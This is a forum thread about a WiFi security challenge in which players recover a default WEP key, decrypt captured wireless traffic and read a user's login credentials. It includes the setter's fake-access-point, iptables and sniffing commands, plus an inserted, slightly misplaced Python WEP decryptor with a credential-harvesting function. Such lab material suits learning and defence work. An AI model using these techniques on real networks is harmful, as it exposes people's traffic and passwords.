
Security Challenge VII

  • 04-01-2012 2:39am
    #1
    Closed Accounts Posts: 2,267 ✭✭✭


    Just after finishing up VI and stating that I wouldn't be running any more, another idea popped into my head:

    VII:

    http://damo.clanteam.com/sch7/

    Usual rules apply.

    This one is completely different from the others. Should be fairly trivial for those in the know, for others there is a bit to learn :-)

    Do you find these type of challenges interesting? 22 votes

    yes
    0% 0 votes
    no
    100% 22 votes


Comments

  • Closed Accounts Posts: 465 ✭✭pacquiao


    On a scale of 1-10, how hard is this one?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    About 2-3.

    Just need the right tools for the job. Should be straight forward enough.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    pacquiao wrote: »
    On a scale of 1-10, how hard is this one?

    If you need a hint, let me know.


  • Closed Accounts Posts: 465 ✭✭pacquiao


    I had a look at it.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    You're on the right track, but maybe edit that spoiler as that is a pretty strong spoiler. You got one piece of info incorrect in it though.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    heheh that was the strong spoiler I was on about but it's slightly incorrect.


  • Closed Accounts Posts: 465 ✭✭pacquiao


    is this it
    WEP Key: 6C52D55CEFC23E5196A83F9BCD


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    pacquiao wrote: »
    is this it
    WEP Key: 6C52D55CEFC23E5196A83F9BCD


    Also wrong, when it's correct you'll know, but you need to know what to do with it when it's correct.


  • Closed Accounts Posts: 465 ✭✭pacquiao


    I got it. That was really enjoyable. It's very realistic too.
    Thanks a lot Damo.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Only 3 guys on the hall of fame:
    Ack!
    pacquiao
    emf

    Are people stuck ?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Jimi Hendrix - third rock from the sun ... wifi


  • Registered Users Posts: 194 ✭✭daffy_duc


    Hi ;)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Well done :-)


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Done. Very good. Also discovered a bug in wireshark while working on it.
    The decode wireless traffic appears broken in 1.4.11 on Fedora. I tried using airdecap-ng to see if it made a difference, which it did, then I analysed the decrypted traffic with wireshark. Took me a while but once I saw the you know what, I was in within minutes.

    Really good challenge and really life-like as another poster said.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    syklops:
    I think it's because aircrack captures wireless frames, while wireshark doesn't. You'll notice wireshark can decode wireless traffic it captures itself.

    By the way that other aircrack tool you use was part of the challenge :-)

    Putting in a spoiler as its giving away the challenge.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    syklops:
    I think it's because aircrack captures wireless frames, while wireshark doesn't. You'll notice wireshark can decode wireless traffic it captures itself.

    By the way that other aircrack tool you use was part of the challenge :-)

    Putting in a spoiler as its giving away the challenge.

    Sorry, I meant to put in a spoiler and for some unknown reason I quoted it instead :confused:

    Have fixed it now. What you said about
    wireshark
    makes sense.


  • Closed Accounts Posts: 3,981 ✭✭✭[-0-]


    This was nice Damo. Thanks 900913 for the pointer.


  • Registered Users Posts: 367 ✭✭900913


    [-0-] wrote: »
    This was nice Damo. Thanks 900913 for the pointer.


    Damo helped me out a lot with this challenge, I knew the key but I didn't know what to do with it. [-0-] now you know how to read encrypted wireless data.
    :-)
    I love these challenges cause I learn so much from them, and it's in a fun way.

    :-)


  • Registered Users Posts: 1,691 ✭✭✭JimmyCrackCorn


    I tried it with the above mentioned tools and it complained about insufficient ISVs. Must give it another go. :rolleyes:


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    make sure you..
    use airdecap-ng rather than aircrack-ng.


  • Registered Users Posts: 2,215 ✭✭✭Kur4mA


    I want to start on these challenges too but I am also a total n00b. I not only think these are brilliant, but would love to see it taken further and have them permanently hosted. I'd be willing to contribute to that and am sure others would too. It would be great to start some knowledge sharing too. :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Just some notes on this challenge. This one was a bit of a tricky one to set up. Putting it in a spoiler in case some of you still want to do the challenge.

    Idea was to have a WiFi spot that has a weak encryption key. In the setup, the WiFi owner would visit the challenge page and log in. Another user (the fictitious character in the prologue of the challenge) sniffs wireless traffic in the air. Little does he know he sniffed encrypted traffic from this WiFi spot, that can actually be decrypted, revealing everything the WiFi owner did, including the credentials he used for the SCHVII hall of fame. Which is the idea of the challenge.

    But I didn't have a spare WiFi spot lying around to create this. So I setup a VM on my laptop running some flavor of linux, and used airbase-ng to create a fake WiFi spot from a wireless adapter (edimax ew-7128g) .

    So I created a fake eircom WiFi spot that is weak to the old wep generation algo that was exposed some years ago. I have matched the SSID, WEP key and MAC, as if it were a real eircom router.

    airbase-ng -e "eircom1234 5670" -a 00:0F:CC:29:C4:74 -c 3 -w 1809d03b82b17d47d8195be596 mon0

    Next, we want the person connecting to this WiFi spot to actually be able to use the internet, so we've got to set up a tap interface and allow them to be assigned an IP. When they connect to my fake WiFi spot, they will actually be routed through my internet connection via my laptop's built-in WiFi adapter (think intel 4965agn). You can look online on how to do this. There is far too much to explain here, but basically what I have executed is:

    ifconfig at0 up
    ifconfig at0 10.0.0.254 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo > '/var/lib/dhcp3/dhcpd.leases'
    ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &


    Mean while, on another(!) WiFi adapter (alfa 500mw awus036h) on the linux VM, as the challenge says: the guy in the prologue (me) ran:
    airmon-ng start wlan0
    airodump-ng -w capture mon0

    ...which captured all traffic on our fake WiFi spot.

    Yet at the same time, on my phone (with all cookies/sessions cleared!), I connected to the fake WiFi spot. Browsed some random pages. Then browsed to the SCHVII challenge page. Logged into the Hall Of Fame with correct credentials, which would go through our fake WiFi spot in the VM, which in turn would have been captured by our other WiFi adapter sniffing/monitoring traffic, and hence, the challenge was created.



  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Anyone stuck on this one?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Solution to this was:

    You will notice many of the files reference "eircom1234 5670". You may have decided to use one of the many online generators to generate a WEP key: 1809d03b82b17d47d8195be596.

    Now you can decrypt the wireless packet capture file:
    # airdecap-ng -w 1809d03b82b17d47d8195be596 *.cap

    View the decrypted file with wireshark.

    You will see what the user was doing on the network. You will see a URL he visited and the credentials he used.

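What airdecap-ng does with that key, and what the setup post above relies on (sniffed WEP traffic being fully recoverable once the key is known), as an added example in Python that is not part of the original thread or the challenge files. It implements WEP's per-frame RC4 decryption and ICV check, runs it over a two-frame capture constructed inline (the 802.11 MAC headers are omitted and the IPv4/TCP checksums are left zero to keep it short; the host, path and credentials in the POST are made up), and pulls the login form out of the decrypted TCP payload, which is the "what to do with the key" step pacquiao and 900913 mention. The wrong-key case uses the key jank got from a generic generator and shows how airdecap-ng tells a bad key from a good one: the decrypted ICV does not match, so the frame is dropped.

```python
"""WEP decryption the way airdecap-ng -w does it, on a capture built inline.

Added example for this thread; the capture, host, path and credentials are
constructed here and are not from the challenge files. The 802.11 MAC header
is omitted (only the WEP body is modelled) and IP/TCP checksums are left zero.
"""
import struct
import zlib

# The 104-bit key from the thread, as passed to airdecap-ng with -w.
KEY = bytes.fromhex("1809d03b82b17d47d8195be596")
# The key a generic online generator gave jank above: wrong for this SSID.
WRONG_KEY = bytes.fromhex("07fd5751e32199b641b49ff667")

LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")  # LLC/SNAP header carrying IPv4


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with the 24-bit IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(plaintext))


def wep_encrypt(key: bytes, iv: bytes, msdu: bytes, key_id: int = 0) -> bytes:
    """What the AP/client does: IV(3) | KeyID byte | RC4(IV||key, msdu || ICV)."""
    return iv + bytes([key_id << 6]) + rc4(iv + key, msdu + icv(msdu))


def wep_decrypt(key: bytes, body: bytes):
    """What airdecap-ng does per frame: returns the MSDU, or None if the ICV fails."""
    iv, ciphertext = body[:3], body[4:]          # byte 3 is the key-ID/pad byte
    plain = rc4(iv + key, ciphertext)
    msdu, got_icv = plain[:-4], plain[-4:]
    return msdu if got_icv == icv(msdu) else None


def ipv4_tcp(payload: bytes, src="10.0.0.5", dst="198.51.100.7", sport=51000, dport=80) -> bytes:
    """Minimal LLC/SNAP + IPv4 + TCP framing for the constructed capture (checksums zero)."""
    def addr(a):
        return bytes(int(x) for x in a.split("."))
    iph = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0x1234, 0x4000,
                      64, 6, 0, addr(src), addr(dst))
    tcph = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return LLC_SNAP_IPV4 + iph + tcph + payload


def tcp_payload(msdu: bytes) -> bytes:
    """Walk LLC/SNAP -> IPv4 -> TCP and return the application data (empty if not TCP)."""
    if msdu[:8] != LLC_SNAP_IPV4 or msdu[8 + 9] != 6:
        return b""
    ihl = (msdu[8] & 0x0F) * 4
    tcp = 8 + ihl
    doff = (msdu[tcp + 12] >> 4) * 4
    return msdu[tcp + doff:]


# Constructed capture: two data frames as airodump-ng would have sniffed them, minus
# MAC headers. IVs are 24-bit and differ per frame; the second frame carries the login.
LOGIN_POST = (b"POST /hof/login HTTP/1.1\r\nHost: challenge.example\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Content-Length: 26\r\n\r\nuser=alice&pass=hunter2xyz")
CAPTURE = [
    wep_encrypt(KEY, b"\x01\x02\x03", ipv4_tcp(b"GET / HTTP/1.1\r\nHost: challenge.example\r\n\r\n")),
    wep_encrypt(KEY, b"\x7a\x0b\x19", ipv4_tcp(LOGIN_POST)),
]


def harvest_credentials(key: bytes, capture):
    """Decrypt every frame, skip ICV failures, return (path, form fields) for each POST."""
    found = []
    for body in capture:
        msdu = wep_decrypt(key, body)
        if msdu is None:
            continue                      # wrong key or corrupt frame
        data = tcp_payload(msdu)
        if not data.startswith(b"POST "):
            continue
        head, _, form = data.partition(b"\r\n\r\n")
        path = head.split()[1].decode()
        fields = dict(p.split("=", 1) for p in form.decode().split("&"))
        found.append((path, fields))
    return found


if __name__ == "__main__":
    print(harvest_credentials(KEY, CAPTURE))        # the user's login
    print(harvest_credentials(WRONG_KEY, CAPTURE))  # [] : every ICV check fails
```

Two things carry over to the real capture: airdecap-ng applies exactly this ICV test to decide whether a key is right (a wrong key decrypts to noise and is silently discarded, so an empty output file is the "wrong key" signal), and nothing in WEP protects the payload beyond RC4 with a 24-bit IV, which is why plaintext HTTP logins come straight out once the key is known.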

  • Banned (with Prison Access) Posts: 13,018 ✭✭✭✭jank


    Have no idea where you get that WEP key, all the online Generators gave me a key of 07FD5751E32199B641B49FF667 and I tried a few of them so that must mean my original plaintext ascii input is wrong..?

    Great challenge though, would love to know if there are more of these out there.


  • Registered Users Posts: 1 gem600


    @jank
    use http://www.bacik.org/eircomwep/ to generate the wep key.

